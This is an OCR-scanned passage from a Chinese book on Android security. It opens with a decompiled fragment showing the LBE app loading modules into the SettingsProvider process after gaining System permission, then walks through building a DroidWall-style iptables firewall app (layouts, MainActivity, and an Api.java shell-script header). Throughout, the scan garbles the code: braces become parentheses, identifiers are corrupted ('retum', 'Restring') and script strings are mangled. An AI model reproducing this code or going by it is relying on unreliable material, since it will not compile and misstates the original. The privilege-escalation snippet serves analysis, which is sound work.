(7) 此 时 LBE 的 代码 已 经 获得 System 权限 ， 就 可 以 在 SettingsProvider 进程 里 加 载 其 他 功能 模块 ， 实 
现 rooftree 功能 ， 如 图 20-38 所 示 。 


try { 

label 9 
this.a(arg9, this.f.getAbsolutePath(), "service.jar", true); 
this.a(arg9, this.f.getAbsolutePath(), "client.jar", true); 
this.a(arg9, this.f.getAbsolutePath(), "core.jar", true); 
this.a(arg9, this.f.getAbsolutePath(), "libclient.so", false); 
this.a(arg9, this.f.getAbsolutePath(), "libservice.so", false); 

this.f.getAbsolutePath(), "libcore.so", false); 


try ( 


assLoader(new File(this.f, "core.jar").getAbsolutePath(), ClassLoader.getSystemClassLoader()); 
_1 = Class.forName ("com.lbe.security.service.core.loader2.LoaderServiceEx", true, this.c); 

Method v2 2 = v2 1.getDeclaredMethod("rootFreeMode", String.class, String.class); 

v2 2.invoke(null, this.f.getAbsolutePath(), arg8); 


this 
goto 1 
} 


图 20-38 ”实现 rooftree 功能 


第 4 篇 综合 实战 篇 


第 21 章 网 络 防火 墙 系统 
第 22 章 跟踪 定位 系统 


第 21 章 网 络 防火 墙 系统 


本 章 的 网 络 流量 防火 墙 系统 实例 采用 Android 开源 系统 技术 ， 利 用 Java 语言 和 Eclipse 开发 工具 对 防火 
墙 系统 进行 开发 。 同 时 给 出 详细 的 系统 设计 流程 、 部 分 界面 图 及 主要 功能 效果 流程 图 ， 还 对 开发 过 程 中 过 
到 的 问题 和 解决 方法 进行 详细 的 讨论 。 整 个 系统 实例 汇集 了 允许 上 网 、 权 限 设置 、 系 统 帮助 等 功能 于 一 体 
在 Android 系统 中 能 独立 运行 。 在 讲解 具体 编码 之 前 ， 先 简要 介绍 本 项 目的 产生 背景 和 项 目 意义 ,为 后 面 的 


系统 设计 及 编码 工作 做 好 准备 。 


21.1 系统 需求 分 析 


GE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 21 章 \ 系 统 需求 分 析 .avi 


根据 项 目的 目标 ， 可 分 析出 系统 的 基本 需求 ， 以 下 从 软件 设计 的 角度 来 描述 系统 的 功能 ， 并 且 使 用 例 
图 来 描述 ， 系 统 的 功能 模块 大 致 分 成 两 部 分 来 概括 ， 分 别 是 主 界面 和 设置 界面 。 而 主 界面 又 可 以 细 分 为 选 


择 模式 和 勾 选 应 用 两 部 分 ， 而 设置 界面 又 可 以 细 分 为 防火 墙 开 关 、 日 志 开关 、 保 存 


多 六 个 部 分 。 整 个 系统 的 构成 模块 结构 如 图 21-1 所 示 。 


岗 则 、 退 出 、 帮 助 和 更 


= m ES 


O modas 


网 络 防火 墙 系统 上 


=y 


日 志 开关 


= sem 


=) wmm > 


退出 


21-1 系统 构成 模块 
(1) 系统 性 能 需求 
根据 Android 手机 系统 要 求 无 响应 时 间 为 5 秒 ， 所 以 有 如 下 性 能 要 求 。 


sas memxeae | 


О 选择 模式 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 
О 义 选 应 用 设置 ， 程 序 响 应 时 间 最 长 不 能 超过 5 秒 。 
口 防火 墙 开关 设置 ， 程 序 响 应 时 间 最 长 不 能 超过 5 秒 。 
О 日 志 开 关 设 置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 
口 保存 规则 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 
(2) 运行 环境 需求 

E: Android 手 机 基于 Linux 操 作 系 统 。 
Android 2.3 以 上 版 本 。 

O 开发 环境 : Eclipse 3.5 ADT 0.95. 


21.2 编写 布局 文件 


и 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 21 章 \ 编 写 布局 文件 .avi 
(1) 首先 编写 主 界面 文件 main.xml， 系 统 执行 之 后 显示 主 界面 ， 具 体 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<LinearLayout android:layout_width="fill_parent" 
android:layout height-"fill parent" xmIns:android-"http://schemas.android.com/apk/res/android" 
android:orientation="vertical" android:duplicateParentState="false"> 
«View android:layout_width="fill_ parent" android:layout_height="1sp" 
android:background="#F FFFFFFEF" /> 
<LinearLayout android:layout_width="fill_parent" 
android:layout_height="wrap_content" android:padding="8sp"> 
<TextView android:layout widthz"wrap content" 
android:layout height-"wrap content" android:id="@+id/label_mode" 
android:text="Mode: " android:textSize="20sp" android:clickable="true"></TextView> 
</LinearLayout> 
«View android:layout_width="fill_ parent" android:layout height-"1sp" 
android:background="#FFFFFFFF" /> 
«RelativeLayout android:layout_width="fill_ parent" 
android:layout height-"wrap content" android:padding="3sp"> 
«ImageView android:layout width-"wrap content" 
android:layout height-"wrap content" android:id="@+id/img_wifi" 
android:src-"(Qdrawable/eth wifi" android:clickable-"false" 
android:layout alignParentLeft-"true" android:paddingLeft="3sp" 
android:paddingRight="10sp"></ImageView> 
«ImageView android:layout_width="wrap_content" 
android:layout_height="wrap_content" android:id="@+id/img_3g" 
android:layout_toRightOf="@id/img_wifi" android:src="@drawable/eth_g" 
android:clickable="false"></ImageView> 
<ImageView android:layout width-"wrap content" 
android:layout height-"wrap content" android:id-"(g)*id/img download" 
android:src-"(gdrawable/download" android:layout alignParentRight-"true" 
android:paddingLeft="22sp" android:clickable="false"></ImageView> 
«ImageView android:layout width-"wrap content" 
android:layout height-"wrap content" android:id="@+id/img_upload" 
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android:layout_toLeftOf="@id/img_download" android:src="@drawable/upload" 
android:clickable="false"></ImageView> 
</RelativeLayout> 
<ListView android:layout width-"wrap content" 
android:layout height-"wrap content" android:id="@+id/listview"></ListView> 
</LinearLayout> 
在 上 述 代码 中 ， 将 整个 主 界面 划分 为 了 如 下 两 个 部 分 。 
о 上 部 分 : 显示 模式 和 网 络 类 型 ， 其 中 模式 分 为 黑 名 单 模式 和 白 名 单 模式 两 种 。 
о 下 部 分 : 列表 显示 了 某 种 模式 下 的 所 有 网 络 服务 , 并 且 在 每 种 服务 前 显示 一 个 复 选 框 按钮 ,通过 按 
钮 可 以 设置 某 种 服务 启用 还 是 禁用 。 
列表 功能 是 通过 文件 listitem.xml 实现 的 ， 具 体 代 码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" 
android:layout_width="fill_ parent" android:layout_height="fill_parent"> 
<CheckBox android:layout_width="wrap_content" 
android:layout_height="wrap_content" android:id="@+id/itemcheck_wifi" 
android:layout_alignParentLeft="true"></CheckBox> 
<CheckBox android:layout_width="wrap_content" 
android:layout height-"wrap content" android:id="@+id/itemcheck_3g" 
android:layout_toRightOf="@id/itemcheck_wifi"></CheckBox> 
<TextView android:layout_height="wrap_content" android:id="@+id/app_text" 
android:text="uid:packages" android:layout_width="match_parent" 
android:layout_toRightOf="@id/itemcheck_3g" android:layout_centerVertical="true" 
android:paddingRight="80sp"></TextView> 
<TextView android:layout_height="wrap_content" android:id="@+id/download" 
android:layout_width="wrap_content" android:layout alignParentRight-"true" 
android:layout centerVertical-"true" android:paddingLeft="1 5sp"></TextView> 
<TextView android:layout height-"wrap content" android:id-" (a) *id/upload" 
android:layout width-"wrap content" android:layout_toLeftOf="@id/download" 
android:layout_centerVertical="true"></TextView> 
</RelativeLayout> 
系统 主 界面 的 效果 如 图 21-2 所 示 。 
(2) 编写 帮助 界面 布局 文件 help_dialog.xml， 主 要 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android" 
android:layout_width="fill_ parent" android:layout_height="wrap_content"> 
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android" 
android:layout_width="fill_parent" android:layout_height="fill_parent"> 
<TextView android:layout height-"fill parent" 
android:layout width-"fill parent" android:text-"(g'string/help dialog text" 
android:padding-"6dip" /> 
</ScrollView> 
</FrameLayout> 


系统 帮助 界面 的 效果 如 图 21-3 所 示 。 
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212 主 界面 效果 图 21-3 帮助 界面 效果 


213 编写 主 程序 文件 


GE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 21 章 \ 编 写 主 程序 文件 .avi 
布局 文件 编写 完毕 之 后 ， 还 需要 编写 值 文件 strings.xml， 具 体 代码 比较 简单 ， 请 读者 参考 本 书 附带 光盘 
中 的 代码 即 可 ， 在 此 不 再 进行 详细 介绍 。 接 下 来 开始 详细 讲解 使 用 Java 编写 主 程序 文件 的 具体 实现 流程 。 


21.3.1 + Activity 文件 


首先 编写 文件 MainActivity.java， 此 文件 是 整个 系统 的 核心 ， 能 够 实现 服务 勾 选 处 理 和 模式 设置 功能 ， 
选中 后 会 禁止 或 开启 某 项 网 络 服务 。 文 件 MainActivity.java 的 具体 实现 流程 如 下 所 示 。 
О 定义 类 MainActivity 为 项 目 启动 后 首先 显示 的 Activity, 设置 按 下 Menu 键 后 显示 的 选项 ,并 设置 需要 
的 各 个 实例 函数 ， 主 要 代码 如 下 所 示 。 
a 
* Ж activity. 当 打开 应 用 时 ， 这 是 被 显示 的 屏幕 
«i 
public class MainActivity extends Activity implements OnCheckedChangeListener, 
OnClickListener { 
I) 按 下 Menu 键 后 显示 的 选项 
private static final int MENU DISABLE = 0; 
private static final int MENU TOGGLELOG = 1; 
private static final int MENU APPLY - 2; 
private static final int MENU EXIT = 3; 
private static final int MENU HELP - 4; 
private static final int МЕМО SHOWLOG = 5; 
private static final int MENU SHOWRULES = 6; 
private static final int MENU CLEARLOG = 7; 
private static final int MENU SETPWD - 8; 
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[iE EXTR SC DII 

private ListView listview; 

@Override 

public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedlInstanceState); 
checkPreferences(); 
setContentView(R.layout.main); 
this.findViewByld(R.id.label mode).setOnClickListener(this); 
Api.assertBinaries(this, true); 


} 
@Override 
protected void onStart() ( 
super.onStart(); 
11 Force re-loading the application list 
Log.d("DroidWall", "onStart() - Forcing APP list reload!"); 
Api.applications = null; 
} 
@Override 
protected void onResume() { 
super.onResume(); 
if (this.listview == null) { 
this.listview = (ListView) this.findViewByld(R.id.listview); 
} 
refreshHeader(); 
final String pwd = getSharedPreferences(Api.PREFS_NAME, 0).getString( 
Api.PREF PASSWORD, ""); 
if (pwd.length() == 0) ( 
11 No password lock 
showOrLoadApplications(); 
) else ( 
// Check the password 
requestPassword(pwd); 
) 
} 
@Override 
protected void onPause() { 
super.onPause(); 
this.listview.setAdapter(null); 
5 
O 定义 函数 checkPreferences() 检 查 被 存放 的 选项 正常 ， 具 体 代码 如 下 所 示 。 
a 
* 检查 被 存放 的 选项 正常 


private void checkPreferences() { 
final SharedPreferences prefs = getSharedPreferences(Api.PREFS NAME, 0); 
final Editor editor = prefs.edit(); 
boolean changed = false; 
if (prefs.getString(Api.PREF MODE, "").length() == 0) ( 
editor.putString(Api.PREF MODE, Api.MODE WHITELIST); 
changed - true; 


e. 
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1% 删除 旧 的 选项 名 字 */ 
if (prefs.contains("AllowedUids")) { 


editor.remove("AllowedUids"); 
changed - true; 

} 

if (prefs.contains("Interfaces")) ( 
editor.remove("Interfaces"); 
changed = true; 

} 

if (changed) 
editor.commit(); 


} 
O “定义 函数 refreshHeader() 来 刷新 显示 当前 运行 的 和 网 络 相关 的 程序 ， 具 体 代码 如 下 所 示 。 
p 
* 刷新 显示 当前 运行 的 和 网 络 相 关 的 程序 
s 
private void refreshHeader() { 
final SharedPreferences prefs = getSharedPreferences(Api.PREFS_NAME, 0); 
final String mode = prefs.getString(Api.PREF MODE, Api.MODE_WHITELIST); 
final TextView labelmode = (TextView) this 
.findViewByld(R.id.label_mode); 
final Resources res = getResources(); 
int resid = (mode.equals(Api. MODE WHITELIST) ? R.string.mode whitelist 
: R.string.mode_blacklist); 
labelmode.setText(res.getString(R.string.mode header, 
res.getString(resid))); 
resid = (Api.isEnabled(this) ? R.string.title enabled 
: Restring.title disabled); 
setTitle(res.getString(resid, Api. VERSION)); 


O 定义 函数 selectMode() 显 示 对 话 框 选择 操作 方式 ， 供 选择 黑 名 单 模式 还 是 白 名 单 模式 。 具 体 代 码 如 
下 所 示 。 
fa 
* 显示 对 话 框 选择 操作 方式 ， 供 用 户 选择 黑 名 单 模式 还 是 白 名 单 模式 
qj 
private void selectMode() { 
final Resources res = getResources(); 
new AlertDialog.Builder(this) 
.setitems( 
new String[ ] ( res.getString(R.string.mode whitelist), 
res.getString(R.string.mode blacklist) ), 
new DialogInterface.OnClickListener() { 
public void onClick(DialogInterface dialog, 
int which) ( 
final String mode = (which == 0 ? Ap. MODE WHITELIST 
: Api.MODE BLACKLIST); 
final Editor editor = getSharedPreferences( 
Api.PREFS NAME, 0).edit(); 
editor.putString(Api.PREF MODE, mode); 
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editor.commit(); 
refreshHeader(); 


} 
}).setTitle("Select mode:").show(); 
} 
О 定义 函数 setPassword0) 来 设置 一 个 系统 密码 ， 如 果 设 置 密码 后 ， 在 进入 主 界面 前 会 通过 函数 
requestPassword() 来 验证 密码 ， 只 有 密码 正确 才能 进入 ， 具 体 代 码 如 下 所 示 。 
* 设置 一 个 新 的 密码 
zi 
private void setPassword(String pwd) ( 
final Resources res 7 getResources(); 
final Editor editor = getSharedPreferences(Api.PREFS NAME, 0).edit(); 
editor.putString(Api.PREF PASSWORD, pwd); 
String msg; 
if (editor.commit()) { 
if (pwd.length() > 0) { 
msg = res.getString(R.string.passdefined); 
) else { 
msg - res.getString(R.string.passremoved); 


) else ( 
msg = res.getString(R.string.passerror); 


} 
Toast.makeText(MainActivity.this, msg, Toast.LENGTH_SHORT).show(); 


* 如 果 设置 了 密码 ， 显 示 主 界面 前 先 验证 密码 
T 
private void requestPassword(final String pwd) { 
new PassDialog(this, false, new android.os.Handler.Callback() { 
public boolean handleMessage(Message msg) { 
if (msg.obj == null) { 
MainActivity.this.finish(); 
android.os.Process.killProcess(android.os.Process.myPid()); 
return false; 
} 
if (Ipwd.equals(msg.obj)) { 
requestPassword(pwd); 
return false; 


} 

// 如 果 密 码 正 确 
showOrLoadApplications(); 
return false; 


) 
)).show(); 
} 
U 编写 函数 toggleLogEnabled0) 实 现 防火 墙 禁用 和 日 志 禁 用 开关 处 理 ， 具 体 代码 如 下 所 示 。 
p 
* 开关 设置 
*I 


@ 
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private void toggleLogEnabled() { 
final SharedPreferences prefs = getSharedPreferences(Api.PREFS NAME, 0); 
final boolean enabled = !prefs.getBoolean(Api.PREF LOGENABLED, false); 
final Editor editor = prefs.edit(); 
editor.putBoolean(Api.PREF LOGENABLED, enabled); 
editor.commit(); 
if (Api.isEnabled(this)) ( 
Api.applySavedIptablesRules(this, true); 
} 
Toast.makeText( 
MainActivity this, 
(enabled ? R.string.log_was enabled : R.string.log_was disabled), 
ToastLENGTH_SHORT).show(); 
) 
О 编写 函数 showOrLoadApplications()， 如 果 在 某 模式 下 有 应 用 则 显示 里 面 的 应 用 。 函 数 showOr- 
LoadApplications() 的 具体 代码 如 下 所 示 。 


pr 
* 如 果 某 模式 下 有 应 用 ， 则 显示 里 面 的 应 用 
“if 


private void showOrLoadApplications() { 
final Resources res = getResources(); 
if (Api.applications == null) { 
final ProgressDialog progress = ProgressDialog.show(this, 
res.getString(R.string.working), 
res.getString(R.string.reading apps), true); 
final Handler handler = new Handler() { 
public void handleMessage(Message msg) { 


try { 
progress.dismiss(); 
) catch (Exception ex) ( 
} 
showApplications(); 
} 
k 
new Thread() ( 
public void run() ( 
Api.getApps(MainActivity.this); 
handler.sendEmptyMessage(0); 
H 
}-start(); 
}else { 


/存储 应 用 ， 显 示 名 单 
showApplications(); 


H 
} 
O 编写 函数 showApplications() 显 示 应 用 名 单 ， 主 要 代码 如 下 所 示 。 
p 
* 显示 应 用 名 单 


private void showApplications() ( 
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final DroidApp[] apps = Api.getApps(this); 
11 Sort applications - selected first, then alphabetically 
Arrays.sort(apps, new Comparator<DroidApp>() { 
@Override 
public int compare(DroidApp o1, DroidApp 02) { 
if ((01.selected wifi | o1.selected 3g) == (02.selected wifi | o2.selected 39)) { 
return String.CASE INSENSITIVE ORDER.compare(o1.names[0], 
02.names[0]); 
} 
if (01.selected_wifi || 01.selected_3g) 
return -1; 
return 1; 
} 
}; 
final Layoutinflater inflater = getLayoutInflater(); 
final ListAdapter adapter = new ArrayAdapter<DroidApp>(this, 
R.layout.listitem, R.id.app text, apps) ( 
@Override 
public View getView(int position, View convertView, ViewGroup parent) { 
ListEntry entry; 
if (convertView == null) ( 
11 Inflate a new view 
convertView = inflater.inflate(R.layout.listitem, parent, 
false); 
entry = new ListEntry(); 
entry.box wifi = (CheckBox) convertView 
find ViewByld(R.id.itemcheck wifi); 
entry.box 3g = (CheckBox) convertView 
-findViewByld(R.id.itemcheck 39); 
entry.app text = (TextView) convertView 
-findViewByld(R.id.app text); 
entry.upload 7 (TextView) convertView 
-findViewByld(R.id.upload); 
entry.download = (TextView) convertView 
-findViewBylId(R.id.download); 
convertView.setTag(entry); 
entry.box_wifi 
.setOnCheckedChangeListener(MainActivity.this); 
entry.box 3g.setOnCheckedChangeListener(MainActivity.this); 
) else ( 
/| 转换 一 个 现 有 视图 
entry = (ListEntry) convertView.getTag(); 
) 
final DroidApp app = apps[position]; 
entry.app text.setText(app.toString()); 
convertAndSetColor(TrafficStats.getUidTxBytes(app.uid), entry.upload); 
convertAndSetColor(TrafficStats.getUidRxBytes(app.uid), entry.download); 
final CheckBox box wifi = entry.box wifi; 
box wifi.setTag(app); 
box wifi.setChecked(app.selected wifi); 
final CheckBox box 3g = entry.box 39; 
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box_3g.setTag(app); 
box_3g.setChecked(app.selected_3g); 
return convertView; 

} 

О 编写 函数 convertAndSetColor0)， 根 据 对 某 选 项 的 设置 显示 内 容 ， 并 设置 显示 内 容 的 颜色 。 假 如 没有 
任何 设置 ， 则 显示 N/A， 如 果 已 经 设置 了 启用 ， 则 显示 已 经 用 过 的 流量 。 函 数 convertAndSetColor() 
的 主要 代码 如 下 所 示 。 

private void convertAndSetColor(long num, TextView text) ( 
String value - null; 
long temp = num; 
float floatnum = num; 
if (num == -1)( 
value = "N/A "; 
text.setText(value); 
text.setTextColor(Oxff919191); 
retum ; 
} else if ((temp = temp / 1024) < 1) { 
value = num + "B"; 
} else if ((floatnum = temp / 1024) < 1) { 
value = temp + "KB"; 
) else { 
DecimalFormat format = new DecimalFormat("##0.0"); 
value = format.format(floatnum) + "MB"; 


) 


text.setText(value); 
text.setTextColor(0xffff0300); 
) 
h 
this.listview.setAdapter(adapter); 
) 
О 进入 系统 主 界面 后 ， 如 果 按 下 Menu 键 则 会 弹出 设置 界面 ， 在 设置 界面 中 可 以 选择 对 应 的 功能 。 在 
设置 界面 中 的 选择 功能 是 通过 如 下 3 个 函数 实现 的 。 
public boolean onCreateOptionsMenu(Menu menu) ( 
menu.add(0, MENU DISABLE, 0, R.string.fw enabled).setlcon( 
android.R.drawable.button onoff indicator on); 
menu.add(0, MENU TOGGLELOG, 0, R.string.log enabled).setlcon( 
android.R.drawable.button onoff indicator on); 
menu.add(0, MENU APPLY, 0, R.string.applyrules).setlcon( 
R.drawable.apply); 
menu.add(0, MENU EXIT, 0, R.string.exit).setIcon( 
android.R.drawable.ic menu close clear cancel); 
menu.add(0, MENU HELP, 0, R.string.help).setlcon( 
android.R.drawable.ic menu help); 
menu.add(0, MENU SHOWLOG, 0, R.string.show log) 
-seticon(R.drawable.show); 
menu.add(0, MENU SHOWRULES, 0, R.string.showrules).setlcon( 
R.drawable.show); 
menu.add(0, MENU CLEARLOG, 0, R.string.clear log).setlcon( 
android.R.drawable.ic menu close clear cancel); 
menu.add(0, MENU SETPWD, 0, R.string.setpwd).setlcon( 


UU Android 系统 安全 和 反 编译 实 必 


android.R.drawable.ic lock lock); 
return true; 


} 


@Override 
public boolean onPrepareOptionsMenu(Menu menu) { 

final Menultem item_onoff = menu.getltem(MENU_DISABLE); 

final Menultem item apply = menu.getltem(MENU APPLY); 

final boolean enabled = Api.isEnabled(this); 

if (enabled) ( 
item onoff.setIcon(android.R.drawable.button onoff indicator on); 
item onoff.setTitle(R.string.fw enabled); 
item apply.setTitle(R.string.applyrules); 

) else { 
item onoff.setIcon(android.R.drawable.button onoff indicator off); 
item onoff.setTitle(R.string.fw disabled); 
item apply.setTitle(R.string.saverules); 

} 

final Menultem item log = menu.getitem(MENU TOGGLELOG); 

final boolean logenabled = getSharedPreferences(Api.PREFS NAME, 0) 

.getBoolean(Api.PREF LOGENABLED, false); 

if (logenabled) ( 
item log.setlcon(android.R.drawable.button onoff indicator on); 
item log.setTitle(R.string.log enabled); 

) else { 
item log.setlcon(android.R.drawable.button onoff indicator off); 
item log.setTitle(R.string.log disabled); 

) 

return super.onPrepareOptionsMenu(menu); 


) 


@Override 
public boolean onMenultemSelected(int featureld, Menultem item) ( 

switch (item.getltemld()) ( 

case MENU_DISABLE: 
disableOrEnable(); 
return true; 

case MENU_TOGGLELOG: 
toggleLogEnabled(); 
return true; 

case MENU_APPLY: 
applyOrSaveRules(); 
return true; 

case MENU EXIT: 
finish(); 
System.exit(0); 
return true; 

case MENU HELP: 
new HelpDialog(this).show(); 
return true; 

case MENU SETPWD: 
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setPassword(); 
return true; 
case MENU_SHOWLOG: 
ShowLog(); 
return true; 
case MENU_SHOWRULES: 
showRules(); 
return true; 
case MENU CLEARLOG: 
clearLog(); 
return true; 
} 
return false; 
} 
О 编写 函数 disableOrEnable0 设 置 开 启 或 关闭 防火 墙 ， 具 体 代 码 如 下 所 示 。 
private void disableOrEnable(){ 
final boolean enabled = !Api.isEnabled(this); 
Log.d("DroidWall", "Changing enabled status to: " + enabled); 
Api.setEnabled(this, enabled); 
if (enabled) ( 
applyOrSaveRules(); 
] else { 
purgeRules(); 
} 
refreshHeader(); 
} 
О 编写 函数 setPassword() 来 到 设置 密码 界面 ， 具 体 代码 如 下 所 示 。 
private void setPassword(){ 
new PassDialog(this, true, new android.os.Handler.Callback() { 
public boolean handleMessage(Message msg) ( 
if (msg.obj != null) ( 
setPassword((String) msg.obj); 
) 
return false; 
) 
}).show(); 
} 
O 选择 Save rules (保存 规则 ) 后 执行 函数 showRules0)， 有 具体 代码 如 下 所 示 。 
private void showRules() ( 
final Resources res = getResources(); 
final ProgressDialog progress = ProgressDialog.show(this, 
res.getString(R.string.working), 
res.getString(R.string.please wait), true); 
final Handler handler = new Handler(){ 
public void handleMessage(Message msg) ( 
try ( 
progress.dismiss(); 
) catch (Exception ex){ 
} 
if (Api.hasRootAccess(MainActivity.this, true)) 
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return; 
Api.showlptablesRules(MainActivity.this); 
} 
k 
handler.sendEmptyMessageDelayed(0, 100); 
} 
О 编写 函数 showLog0 显 示 日 志 信 息 界面 ， 具 体 代 码 如 下 所 示 。 
private void showLog() { 
final Resources res = getResources(); 
final ProgressDialog progress = ProgressDialog.show(this, 
res.getString(R.string.working), 
res.getString(R.string.please_wait), true); 
final Handler handler = new Handler() ( 
public void handleMessage(Message msg) ( 
try { 
progress.dismiss(); 
} catch (Exception ex) { 
} 
Api.showLog(MainActivity.this); 
} 
k 
handler.sendEmptyMessageDelayed(0, 100); 
} 
О “编写 函数 clearLog() 清 除 系统 内 的 日 志 记录 信息 ， 有 具体 代码 如 下 所 示 。 
private void clearLog() { 
final Resources res = getResources(); 
final ProgressDialog progress = ProgressDialog.show(this, 
res.getString(R.string.working), 
res.getString(R.string.please wait), true); 
final Handler handler = new Handler() ( 
public void handleMessage(Message msg) ( 
try t 
progress.dismiss(); 
} catch (Exception ex) { 
} 
if (IApi.hasRootAccess(MainActivity.this, true)) 
return; 
if (Api.clearLog(MainActivity.this)) { 
Toast.makeText(MainActivity.this, R.string.log cleared, 
Toast.LENGTH_SHORT).show(); 


} 

k 

handler.sendEmptyMessageDelayed(0, 100); 
} 
Q 编写 函数 applyOrSaveRules()， 当 申请 或 保存 规则 后 将 规则 运用 到 本 系统 ， 具 体 代码 如 下 所 示 。 
private void applyOrSaveRules() { 

final Resources res = getResources(); 

final boolean enabled = Api.isEnabled(this); 

final ProgressDialog progress = ProgressDialog.show(this, res 


@ 
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.getString(R.string.working), res 
.getString(enabled ? R.string.applying_rules 
: R.string.saving_rules), true); 
final Handler handler = new Handler() { 
public void handleMessage(Message msg) { 
try { 
progress.dismiss(); 
} catch (Exception ex) { 
} 
if (enabled) { 
Log.d("DroidWall", "Applying rules."); 
if (Api.hasRootAccess(MainActivity.this, true) 
&& Api.applylptablesRules(MainActivity.this, true)) ( 
Toast.makeText(MainActivity.this, 
R.string.rules applied, Toast.LENGTH SHORT) 
.Show(); 
) else ( 
Log.d("DroidWall", "Failed - Disabling firewall."); 
Api.setEnabled(MainActivity.this, false); 
} 
) else ( 
Log.d("DroidWall", "Saving rules."); 
Api.saveRules(MainActivity.this); 
Toast.makeText(MainActivity.this, R.string.rules saved, 
Toast.LENGTH SHORT).show(); 


} 
k 
handler.sendEmptyMessageDelayed(0, 100); 
} 
а 编写 函数 purgeRules0 来 清除 一 个 规划， 具体 代码 如 下 所 示 。 
private void purgeRules() { 
final Resources res = getResources(); 
final ProgressDialog progress = ProgressDialog.show(this, 
res.getString(R.string.working), 
res.getString(R.string.deleting rules), true); 
final Handler handler = new Handler() ( 
public void handleMessage(Message msg) ( 
try { 
progress.dismiss(); 
) catch (Exception ex) ( 
} 
if (IApi.hasRootAccess(MainActivity.this, true)) 
return; 
if (Api.purgelptables(MainActivity.this, true)) ( 
Toast.makeText(MainActivity.this, R.string.rules deleted, 
Toast.LENGTH SHORT).show(); 


} 
y 
handler.sendEmptyMessageDelayed(0, 100); 
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а 编写 函数 onCheckedChanged() 检 查 WiFi 选 项 和 3G 选 项 是 否 发 生变 化 ， 具 体 代码 如 下 所 示 。 
public void onCheckedChanged(CompoundButton buttonView, boolean isChecked) { 
final DroidApp app = (DroidApp) buttonView.getTag(); 
if (app != null) { 
switch (buttonView.getld()) ( 
case R.id.itemcheck wifi: 
app.selected wifi = isChecked; 
break; 
case R.id.itemcheck 3g: 
app.selected 3g = isChecked; 
break; 


} 
到 此 为 止 ， 主 界面 程序 介绍 完毕 ， 按 下 Menu 后 会 弹出 设置 界面 ， 如 图 21-4 所 示 。 
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21.3.2 48H] Activity 文件 


编写 文件 HelpDialog.java， 单 击 设置 面板 中 的 辆 按钮 后 将 会 弹出 帮助 界面 。 文 件 HelpDialog.java [Ж 
体 代码 如 下 所 示 。 
import android.app.AlertDialog; 
import android.content.Context; 
import android.view.View; 
public class HelpDialog extends AlertDialog { 
protected HelpDialog(Context context) { 
super(context); 
final View view = getLayoutlnflater().inflate(R.layout.help dialog, null); 
setButton(context.getText(R.string.close), (OnClickListener)null); 
setlcon(R.drawable.icon); 
setTitle("DroidWall v" + Api. VERSION); 
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setView(view); 
} 
21.3.3 ”公共 库 函 数 文件 


编写 文件 Apijava， 在 此 文件 中 定义 了 项 目 中 需要 的 公共 库 函 数 。 为 了 便于 项 目的 开发 ， 专 门 用 此 文件 
保存 了 系统 中 经 常 需 要 的 函数 。 文 件 Apijava 的 具体 代码 如 下 所 示 。 
а 编写 函数 scriptHeader() 创 建 一 个 通用 的 Script 程 序 头 ， 此 程序 可 供 二 进 制 数据 使 用 。 具 体 代码 如 下 
所 示 。 
private static String scriptHeader(Context ctx) { 
final String dir = ctx.getDir("bin", 0).getAbsolutePath(); 
final String myiptables = dir + "/iptables_armv5"; 
return "" + "IPTABLES=iptables\n" + "BUSYBOX=busybox\n" + "GREP=grep\n" 
+ "ECHO=echo\n" + "# Try to find busybox\n" + "if" 
+ dir 
+ "/Љљиѕубох 91 —help >/dev/null 2>/dev/null ; then\n" 
+" BUSYBOX=" 
+ dir 
+ "/busybox_g1\n" 
+" GREP=\"$BUSYBOX grep\"\n" 
+" ECHO=\"$BUSYBOX echo\"\n" 
+ "elif busybox —help >/dev/null 2>/dev/null ; then\n" 
+" BUSYBOX=busybox\n" 
+ "elif /system/xbin/busybox --help >/dev/null 2>/dev/null ; then\n" 
+" BUSYBOX=/system/xbin/busybox\n" 
+ "elif /system/bin/busybox —help >/dev/null 2>/dev/null ; then\n" 
+" BUSYBOX=/system/bin/busybox\n" 
+ "fn" 
+ "it Try to find grep\n" 
+ "if! SECHO 1 | $GREP -q 1 >/dev/null 2>/dev/null ; then\n" 
+" if SECHO 1 | SBUSYBOX grep -q 1 >/dev/null 2>/dev/null ; then\n" 
+" GREP=\"$BUSYBOX grep\"\n" 
+"fi\n" 
+ "$t Grep is absolutely required\n" 
+ "if! $SECHO 1 | $GREP -q 1 >/dev/null 2>/dev/null ; ћеп\п" 
+" $ECHO The grep command is required. DroidWall will not work.\n" 
+ "exit 1n" 
+ "fin" 
* "fin" 
+ "# Try to find iptables\n" 
iW 
* myiptables 
+ " version >/dev/null 2>/dev/null ; then\n" 
*"IPTABLES-" 
+ myiptables + "in" + "п" + ""; 


} 
О 编写 函数 copyRawFile(), 复制 一 个 未 加 工 的 资源 文件 , 根据 其 ID 给 特定 的 位 置 复制 一 个 未 加 工 的 资 
源 文件 。 具 体 代 码 如 下 所 示 。 
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private static void copyRawFile(Context ctx, int resid, File file, 
String mode) throws IOException, InterruptedException { 
final String abspath = file.getAbsolutePath(); 
11 在 iptables 写 入 二 进 制 数据 
final FileOutputStream out = new FileOutputStream(file); 
final InputStream is = ctx.getResources().openRawResource(resid); 
byte buf[ ] = new byte[1024]; 
int len; 
while ((len = is.read(buf)) > 0) { 
out.write(buf, 0, len); 
} 
out.close(); 
is.close(); 
I] 允许 改变 
Runtime.getRuntime().exec("chmod " + mode + " " + abspath).waitFor(); 
} 
а 编写 函数 applyIptablesRulesImpl0， 功 能 是 清除 并 且 重 新 加 写 所 有 规则 ， 此 功能 是 在 内 部 实施 的 。 
函数 applyIptablesRulesImpl0 的 具体 代码 如 下 所 示 。 
private static boolean applylptablesRulesImpl(Context ctx, 
List<Integer> uidsWifi, List<Integer> uids3g, boolean showErrors) { 
if (ctx == null) ( 
return false; 
} 
assertBinaries(ctx, showErrors); 
